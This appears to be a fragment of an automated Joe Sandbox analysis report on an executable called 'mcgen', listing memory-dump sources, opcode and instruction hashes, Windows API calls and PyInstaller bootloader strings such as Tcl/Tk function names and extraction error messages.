                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction ID: 054cb1c613dda13c99a8d71afe107cac4011e474602f65d708d7f01266fc2a64
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D41F622714A9582EF04CF6EDA24269B3A5FB48FE0B499436EF0DD7B59DE3CD5418300
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction ID: 0e3bb9eccb50f775f36c0acec917732770a32bcfef259014a5af0b91a7e76bbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42318432B1DB8282E7649F29A84027E7699AB85BE1F144239FB5D93BD5DF3CD0118704
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction ID: 4d7594d7a713ae1406f063b44eb4da79171a862608b0ea43b618587a1fcb44a8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF04F71B182968BDBA88F6DA80262977D4FB083D5F80C039E789C3A14DE7C90618F04
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction ID: bfca61075236917839c8c8ff3014cc055ab4e848f2eeb1e213f26fe47296abad
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02A0016190C82AD0E6598F29A8A01356338BB51366B400131E20D820A09F6CA4009251
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                    • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                    • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction ID: 0c87f224aa3ae58cc8d5940a75d2a47234425edf6301dcbc82771e783c497552
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F02B5A0A0DB1791FE259F7EA8605B423ADAF057B7F544035DB1EC3260EF3CB5588262
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F19400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B9F145E4,00000000,00007FF6B9F11985), ref: 00007FF6B9F19439
                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B9F188A7,?,?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F1821C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12810: MessageBoxW.USER32 ref: 00007FF6B9F128EA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                    • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                                    • Instruction ID: 386707338cad5ae1fbee884ed00956b28f4333bfd88fda9d00634326c69211f4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D851CB51B1C6A241FB619F3DE9512B92258EF967A2F444031EB0EC36D5EE3CE005C790
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                    • String ID: P%
                                                                                                                                                                                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                    • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                    • Instruction ID: e541e2d943aefbfa98d8323facf1c8f315f038368c757b2f0be2f9395589beef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD51E866608BA186D6349F36E4581BAB7A1F798BA2F004135EFDE83794DF3CD085DB10
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                    • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                    • Instruction ID: e6ad37a2b96932608e2bb081b681cf2f9c53eda15366a0dac0eb93e3d8f27e84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07217162B0CA5282E7558F7EA9641796258EF89BF3F584131DB2DC33A4DE2CD5908211
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                    • Instruction ID: 2c70acacee153bd8be5aa881f136da5d21ce04e6ed57b5f12a3a1c18e6f142ab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6126E62E0D1C386FB245E99A1543B97699FB40766F944137F79A8B6C4DF3CE9808B00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                    • Instruction ID: 28db7993bf3520b09925e22a9528af36d3ac3e9e8a3f048d83e4c5687f741529
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA126221F0C1C385FB209E59A05477A766AFB8176AF988135F799C75C4DF7DE8808B08
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: 4cc54575f44bf6f2f4858099a4d2ef854ab704aef2a59d680940986a275edb76
                                                                                                                                                                                                                                                                    • Instruction ID: 7b599659ce1b3c64d7a9073704529e44ca86019039f0955f4993c50dfd151c4c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc54575f44bf6f2f4858099a4d2ef854ab704aef2a59d680940986a275edb76
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE419661B1C6B242EA14DF29A8106B9A39CFF45BE6F548531EF0D97795DE3CE1018780
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: d29ee8b892decec41a2eef625e99541147c5159d7bb399182ff555fbc9cd6221
                                                                                                                                                                                                                                                                    • Instruction ID: 8be978f6cd17b13e4ce43d89b2732511896161ea4acae3bd1ea3e97f422f7712
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d29ee8b892decec41a2eef625e99541147c5159d7bb399182ff555fbc9cd6221
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9241A362B086A286EB10DF3994102B97398FF457A6F848532EF0D87B95DF3CE502C745
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                    • Instruction ID: 9ec519fcebbf1881a87c8b349615565c5e593715a0bbd5a59b928582f167b132
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36D17DB2A0877186EB20DF2994403AD7BA9FB567A9F100135EF4D97B95DF38E480C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12C9E
                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12D63
                                                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF6B9F12D99
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                    • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                    • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                    • Instruction ID: 210438946354a18f8fbe362e5ec87bf74fe9d8437b7abca0984244b5ccc5fd6b
